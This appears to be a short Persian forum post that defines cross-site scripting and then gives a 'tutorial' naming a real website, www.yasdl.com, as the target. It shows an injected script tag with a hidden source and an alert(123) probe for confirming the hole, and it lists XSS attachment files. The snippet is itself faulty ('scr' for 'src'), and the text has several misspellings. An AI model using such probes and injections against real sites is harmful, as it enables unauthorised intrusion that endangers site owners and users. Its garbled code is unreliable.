آشنایی با حملات xss یا Corss Site Scripting
نوعی آسیب پذیری رایانه است که
که معمولا در برنامه های وب یافت می شود.
حملات xss به مهاجمان امکان میدهد اسکریپت های سمت مشتری به صفهات وب که توسط سایر کاربران مشاهده میشود تزریق کنند.
یک آسیپ پذیری در سطح سایت ممکن است توسط مهاجمین برای دور زدن کنترل های دسترسی مانند سیاست همان مبدا استفاده میشود
##################
آموزش تزریق اسکریپت و نحوه حمله xss
نحوه عمل حمله xss
یه اسکریپت بنویسید و کد های فوقه را در اون قرار بدید در اینجا من تارگت رو سایت www.yasdl.com قرار دادم خوب بریم سراغ آموزش
<html>
<head>
<script scr="[Hidden Content]" ></script>
// در اینجا من اولین اسکرپت رو تزیق کردم
<script>alert(123);</script>
این کد یه alert نشان میده و شما از این راه میفهمین سایت فوقه باگ xss داره
</head>
</html>
باگ xss.txt
XSS.zip